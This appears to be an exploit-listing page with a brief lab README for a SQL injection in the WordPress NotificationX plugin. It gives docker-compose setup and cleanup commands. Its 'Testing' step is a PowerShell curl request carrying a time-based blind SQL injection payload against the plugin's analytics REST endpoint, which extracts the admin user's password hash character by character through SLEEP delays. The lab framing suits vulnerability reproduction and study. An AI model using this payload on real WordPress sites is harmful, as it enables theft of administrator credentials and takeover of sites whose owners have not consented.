Share
## https://sploitus.com/exploit?id=F53E3EAD-639D-59DF-B0A6-88874357217F
## Set-up

```
docker-compose up --build
```

## Clean up
```
docker-compose down
```

## Testing

```
Measure-Command {
    curl.exe http://localhost/wp-json/notificationx/v1/analytics `
        -Method Post `
        -Body 'nx_id=1337&type=clicks`=IF(ASCII(SUBSTRING((select user_pass from wp_users where id=1),1,1))=36,SLEEP(10),null)-- -'
}
```